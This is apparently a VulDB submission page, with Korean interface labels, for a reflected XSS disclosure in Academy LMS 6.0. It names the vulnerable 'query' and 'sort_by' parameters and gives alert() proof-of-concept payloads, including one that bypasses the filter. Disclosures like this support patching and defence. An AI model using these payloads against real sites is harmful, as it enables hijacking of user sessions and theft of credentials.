| 제목 | Academy LMS 6.0 - Reflected XSS |
|---|
| 설명 | # Exploit Title: Academy LMS 6.0 - Reflected XSS
# Exploit Author: skalvin aka (CraCkEr)
# Date: 22/07/2023
# Vendor: Creativeitem
# Vendor Homepage: https://creativeitem.com/
# Software Link: https://demo.creativeitem.com/academy/
# Tested on: Windows 10 Pro
# Impact: Manipulate the content of the site
## Description
The attacker can send to victim a link containing a malicious URL in an email or instant message
can perform a wide variety of actions, such as stealing the victim's session token or login credentials
Path: /academy/home/courses
GET parameter 'query' is vulnerable to XSS
https://website/academy/home/courses?query=[XSS]
Path: /academy/home/courses
GET parameter 'sort_by' is vulnerable to XSS
https://website/academy/home/courses?category=web-design&price=all&level=all&language=all&rating=all&sort_by=[XSS]
XSS Payloads (Blocked) :
<script>alert(1)</script>
ldt4d"><ScRiPt>alert(1)</ScRiPt>nuydd
XSS Payload Bypass Filter :
cplvz"><img src=a onerror=alert(1)>fk4ap
[-] Done |
|---|
| 사용자 | skalvin (UID 49463) |
|---|
| 제출 | 2023. 07. 22. AM 12:55 (3 연령 ago) |
|---|
| 모더레이션 | 2023. 08. 02. PM 10:31 (12 days later) |
|---|
| 상태 | 수락 |
|---|
| VulDB 항목 | 235966 [Academy LMS 6.0 /academy/home/courses query/sort_by 크로스 사이트 스크립팅] |
|---|
| 포인트들 | 17 |
|---|